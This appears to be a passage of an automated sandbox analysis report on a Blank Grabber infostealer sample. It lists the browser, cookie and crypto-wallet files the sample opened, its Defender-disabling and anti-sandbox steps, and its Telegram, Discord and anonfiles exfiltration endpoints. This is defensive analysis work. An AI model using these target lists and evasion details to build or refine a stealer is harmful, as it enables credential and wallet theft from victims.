              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7320, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73202\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              File and Directory Permissions Modification              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts22
              Command and Scripting Interpreter              		2
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		4
              Disable or Modify Tools              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol3
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		Logon Script (Windows)11
              Process Injection              		11
              Deobfuscate/Decode Files or Information              		Security Account Manager49
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
              Registry Run Keys / Startup Folder              		31
              Obfuscated Files or Information              		NTDS771
              Security Software Discovery              		Distributed Component Object Model1
              Clipboard Data              		5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
              Software Packing              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials461
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              File Deletion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc Filesystem11
              Remote System Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt461
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow11
              System Network Configuration Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584305 Sample: KpHYfxnJs6.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 67 ip-api.com 2->67 69 discord.com 2->69 71 blank-whj1o.in 2->71 85 Sigma detected: Capture Wi-Fi password 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 Yara detected Blank Grabber 2->89 91 14 other signatures 2->91 11 KpHYfxnJs6.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 109 Query firmware table information (likely to detect VMs) 11->109 111 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->111 113 Self deletion via cmd or bat file 11->113 115 7 other signatures 11->115 15 KpHYfxnJs6.exe 1 109 11->15         started        signatures6 process7 dnsIp8 73 ip-api.com 208.95.112.1, 49904, 50006, 80 TUT-ASUS United States 15->73 75 discord.com 162.159.137.232, 443, 50007 CLOUDFLARENETUS United States 15->75 77 Query firmware table information (likely to detect VMs) 15->77 79 Found many strings related to Crypto-Wallets (likely being stolen) 15->79 81 Self deletion via cmd or bat file 15->81 83 11 other signatures 15->83 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 37 other processes 15->26 signatures9 process10 signatures11 93 Suspicious powershell command line found 19->93 95 Uses ping.exe to sleep 19->95 97 Uses cmd line tools excessively to alter registry or file data 19->97 107 4 other signatures 19->107 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        99 Modifies Windows Defender protection settings 22->99 33 powershell.exe 23 22->33         started        35 conhost.exe 22->35         started        101 Adds a directory exclusion to Windows Defender 24->101 37 powershell.exe 24->37         started        39 conhost.exe 24->39         started        103 Encrypted powershell cmdline option found 26->103 105 Tries to harvest and steal WLAN passwords 26->105 41 systeminfo.exe 26->41         started        43 getmac.exe 26->43         started        45 72 other processes 26->45 process12 file13 117 Loading BitLocker PowerShell Module 33->117 119 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 41->119 121 Writes or reads registry keys via WMI 41->121 63 C:\Users\user\AppData\...\bifucm0t.cmdline, Unicode 45->63 dropped 65 C:\Users\user\AppData\Local\Temp\CoY55.zip, RAR 45->65 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\bifucm0t.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              KpHYfxnJs6.exe43%VirustotalBrowse
              KpHYfxnJs6.exe42%ReversingLabsWin32.Ransomware.BlankGrabber
              KpHYfxnJs6.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI73202\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pyd5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_lzma.pyd5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_queue.pyd5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_sqlite3.pyd5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\python311.dll3%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\select.pyd5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.210.172
              		truefalse
                discord.com
                		162.159.137.232
                		truefalse
                  ip-api.com
                  		208.95.112.1
                  		truetrue
                    blank-whj1o.in
                    		unknown
                    		unknownfalse

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabKpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                        https://github.com/Blank-c/BlankOBFKpHYfxnJs6.exe, 00000004.00000003.2477253550.000000000751C000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2476955090.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2477574891.000000000751C000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2477964059.000000000751C000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2477530638.0000000007560000.00000004.00000020.00020000.00000000.sdmpfalse
                          https://www.avito.ru/KpHYfxnJs6.exe, 00000004.00000002.2891396339.00000000079D0000.00000004.00001000.00020000.00000000.sdmpfalse
                            https://duckduckgo.com/ac/?q=KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                              https://api.telegram.org/botKpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                https://github.com/Blank-c/Blank-GrabberiKpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  https://www.ctrip.com/KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    https://github.com/Blank-c/Blank-GrabberrKpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884068871.0000000004DD5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://www.leboncoin.fr/KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          https://tools.ietf.org/html/rfc2388#section-4.4KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.0000000007606000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2745181563.000000000760B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880829085.000000000760D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886692444.0000000007611000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744799637.0000000007604000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2678320239.0000000007606000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64KpHYfxnJs6.exe, 00000004.00000003.2477289912.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2466905986.0000000004E66000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2475127207.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484207815.0000000004E0A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2476647140.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2474208164.0000000004E65000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484268459.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484460219.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2466344184.0000000004E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://weibo.com/KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                https://api.anonfiles.com/uploadKpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.2538439375.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2707327914.00000000046F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://www.msn.comKpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.2545646683.0000000006036000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://discord.com/api/v9/users/KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
